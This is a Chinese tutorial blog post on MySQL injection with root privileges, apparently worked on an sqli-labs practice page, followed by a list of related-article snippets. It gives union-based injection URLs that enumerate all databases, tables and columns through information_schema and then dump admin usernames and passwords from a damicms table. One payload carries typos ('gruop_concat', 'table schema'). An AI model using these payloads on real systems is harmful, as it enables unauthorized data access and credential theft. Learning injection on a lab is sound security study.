MySQL注入之高权限注入
MySQL注入之高权限注入
- 前言
- 二、高权限注入
- 1.什么是高权限注入
- 2.跨库查询思路
- 1.查看用户名
- 2.获取所有的数据库名
- 3.获取指定数据库名下的表名信息
- 4.获取指定damicms下的表名admin下的列名信息
- 4.获取damicms下的admin中的数据
前言
在数据库中有database,schema,table,user,行,列容易被混淆之间的关系
他们之间的关系可以这样理解:
database是一个家,schema就是这个家里面的各个房间,table就是各个房间里的床,行列就是床上面的东西,user就是指这个家的主人
二、高权限注入
1.什么是高权限注入
在上一篇博文中有提到数据库的构成:
数据库A=网站A(同时又一个用户 A)
表名
列名
数据
数据库B=网站B(同时又一个用户B)
表名
列名
数据
这里的用户又分为普通用户和高级用户(eg.root),普通用户只能访问到自己库内的内容,而高级用户就可以做到跨库查询(就是对A,B库的内容都可以读取)
2.跨库查询思路
1.查看用户名
(之前步骤在上一篇博文中有就不进行重复)
是root所以可以进行高权限注入
2.获取所有的数据库名
http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,group_concat(schema_name),3 from information_schema.schemata
3.获取指定数据库名下的表名信息
这里我已’damicms‘为例
http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,group_concat(table_name),3 from information_schema.tables where
table_schema=‘damicms’
4.获取指定damicms下的表名admin下的列名信息
http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,gruop_concat(column_name),3 from information_schema.columns where
table_name=‘dami_admin’ and table schema=‘damicms’
4.获取damicms下的admin中的数据
我们要获取后台登陆信息一般都在admin下所以我们去获取admin的数据
http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,username,password from damicms.dami_admin
MySQL注入之高权限注入相关推荐
- jsp mysql 注入_由Jsp+Mysql注入到root权限的全程展 【好久没有安全类文章了,转一篇看看】...
由Jsp+Mysql注入到root权限的全程展 最近有点空闲,所以写点垃圾文章来消磨一下时间.文中没有什么技术含量,如果要转载,请注明作者并保持文章的完整. 很多人可能都知道asp,php的编程要防止 ...
- [Mysql] 防御和检查SQL注入攻击的手段
SQL注入攻击的种类 知彼知己,方可取胜.首先要清楚SQL注入攻击有哪些种类. 1.没有正确过滤转义字符 在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给一个SQL语句.这 ...
- java远程线程注入_系统权限远程线程注入到Explorer.exe
提升为系统权限,注入到explorer中 一丶简介 我们上一面说了系统服务拥有系统权限.并且拥有system权限.还尝试启动了一个进程. 那么我们是不是可以做点坏事了. 我们有一个系统权限进程.而调用 ...
- mysql占位符 防注入_PyMySQL防止SQL注入
一.SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库. 二.SQL注入攻击的总体 ...
- golang mysql 防注入_Go,Gorm 和 Mysql 是如何防止 SQL 注入的
Go,Gorm 和 Mysql 是如何防止 SQL 注入的 SQL 注入和 SQL 预编译技术 什么是 SQL 注入 所谓SQL注入(sql inject),就是通过把SQL命令插入到Web表单提交或 ...
- 调用其他app 的lib_ButterKnife执行效率为什么比其他注入框架高?它的原理是什么...
面试官: ButterKnife为什么执行效率为什么比其他注入框架高?它的原理是什么 心理分析: ButterKnife框架一直都是使用,很少又开发者对butterknife深入研究的,既然你是面试A ...
- MySQL for Java的SQL注入测试
2019独角兽企业重金招聘Python工程师标准>>> 只要你学JDBC,基本上所有的人都会和你说,Statement不能防止SQL注入, PreparedStatement能够防止 ...
- mysql 宽字符注入_5. 宽字符注入详解与实战
宽字节注入源于程序员设置MySQL连接时的错误配置,如下: set character_set_client=gbk 这样的配置会引发编码转换从而导致绕过某些防护实现注入漏洞.具体分析一下原理: 正常 ...
- mysql注入转义绕过_SQL注入防御绕过——宽字节注入
01 背景知识 字符集 在了解宽字节注入之前,我们先来看一看字符集是什么.字符集也叫字符编码,是一种将符号转换为二进制数的映射关系. 几种常见的字符集: ASCII编码:单字节编码 latin1编码: ...
最新文章
- oracle忘记实例名,Oracle的安装和MS SQL Server实例名
- thymeleaf入门简介
- nlp中bpe_缓冲池扩展(BPE)–内存中OLTP:内存挑战
- mysql 数据库dbhelp_策略模式实现支持多种类数据库的DBHelp
- 机器学习基础(三十五)—— 协同过滤(从匹配用户到匹配商品)
- bzoj 1689: [Usaco2005 Open] Muddy roads 泥泞的路(模拟)
- 华为鸿蒙系统困难重重,困难重重,华为依然积极发展自主操作系统,同时布局鸿蒙和UOS...
- idea快捷键失效,快捷键不能用
- 为什么打工人996会猝死,而老板007不会?
- 智课雅思词汇---二十五、-ate
- MATLAB期末复习
- 【黑马程序员pink老师前端】HTML
- 一个因全局变量引发的故事!
- 整理了60个Python小例子,拿来即用!
- 市场调研—全球及中国活化部分凝血活酶时间测试(APTT测试)行业研究及十四五规划分析报告
- 免费临时邮箱,一次性邮箱
- js向jsf调用后台方法并传递参数
- 刘邦韩信java_刘邦曾言三不杀韩信, 看懂后才知道是在玩他!
- 正则表达式实例搜集,通过实例来学习正则表达式
- 3d打印,机器人,计算机,终于驯服3D打印机器人Leapfrog Creatr HS成为我的好伙伴
热门文章
- 通俗易懂讲解树形DP
- 看了就知道世纪佳缘为什么能够上市了,这个市场的确够大啊
- Python Syntax(Python语法)
- System Monitor for Mac(系统监控工具)破解版安装
- IOT-OS之RT-Thread(十五)--- SDIO设备对象管理 + AP6181(BCM43362) WiFi模块
- percona mysql 审计_Percona MySQL Audit to rsyslog
- mysql 连接数修改
- Java构造方法——乌鸦喝水场景描述
- c++实现svpwm并带防飞车功能
- 【解析关电脑后CPU风扇转不停问题】